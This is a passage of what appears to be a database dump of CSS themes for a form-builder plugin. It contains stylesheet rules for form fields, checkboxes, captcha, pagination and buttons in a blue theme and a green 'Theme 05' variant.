!important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #006A91;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #026994;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #026994;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #006A91;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #01B4F6;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018ABE;\r\n	background: -moz-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0079A6), color-stop(39%, #018ABE ), color-stop(100%, #00B6FA ));\r\n	background: -webkit-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -o-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: -ms-linear-gradient(left, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	background: linear-gradient(to right, #0079A6 0%, #018ABE 39%, #00B6FA 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #C4D5DF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(18,'Theme 05 green','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #007326;\r\nborder: 1px solid #B6E4CF;\r\nmargin-bottom: 10px;\r\ncolor: #B6E4CF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/02/nextbg_hover.png) url([SITE_ROOT]/images/05/02/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #018D08 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #018D08 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/02/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/02/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/02/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #B6E4CF;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 0px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: \" \";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break{\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0D7A31;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #018D08;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00AC0A;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018F08 ;\r\n	background: -moz-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #018D08 ), color-stop(39%, #018F08 ), color-stop(100%, #00BE0A ));\r\n	background: -webkit-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -o-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -ms-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\nbackground: linear-gradient(to right, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #CEE0D3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	